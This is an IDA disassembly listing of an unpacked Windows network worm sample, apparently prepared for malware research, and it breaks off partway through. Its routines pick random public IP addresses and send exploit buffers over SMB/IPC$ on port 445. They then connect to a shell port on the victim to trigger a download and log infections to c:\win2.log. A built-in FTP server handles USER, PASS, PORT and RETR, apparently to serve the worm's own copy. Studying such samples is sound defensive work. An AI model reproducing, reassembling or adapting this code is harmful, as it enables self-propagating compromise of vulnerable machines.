;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B90511B3EECD93EDF0FA01D18B1B2503
; File Name : u:\work\b90511b3eecd93edf0fa01d18b1b2503_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, ds:dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov ds:dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call ds:dword_405114 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call ds:dword_40510C ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call ds:dword_405104 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call ds:dword_405110 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call ds:dword_405108 ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call ds:dword_405018 ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call ds:dword_40511C ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_40510C ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call ds:dword_405110 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc ds:dword_406F34
push edi
push ds:dword_406F34
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call ds:dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_402210
mov esi, ds:dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; _hwrite
push [ebp+arg_0]
call sub_402210
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _hwrite
push edi
call ds:dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 270Ch
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F38
push eax
call ds:dword_405018 ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push ds:off_406030
lea eax, [ebp+var_33C]
push eax
call ds:dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call ds:dword_4050F0 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call ds:dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call ds:dword_40511C ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F38
push [ebp+arg_4]
call ds:dword_405018 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+arg_0]
call ds:dword_405110 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, ds:dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, ds:dword_4050EC
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call ds:dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, ds:dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, ds:dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch
call ds:dword_4050F4 ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, ds:dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, ds:dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, ds:dword_4050EC
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call ds:dword_405028 ; Sleep
push [ebp+var_4]
call ds:dword_40511C ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push ds:off_4068D0
call sub_402210
mov esi, ds:dword_4050F0
pop ecx
push eax
push ds:off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call ds:dword_4050EC ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push ds:off_4068D4
call sub_402210
pop ecx
push eax
push ds:off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push ds:off_4068D8
call sub_402210
pop ecx
push eax
push ds:off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, ds:word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push ds:off_4068E0
call sub_402210
pop ecx
push eax
push ds:off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push ds:off_4068E4
call sub_402210
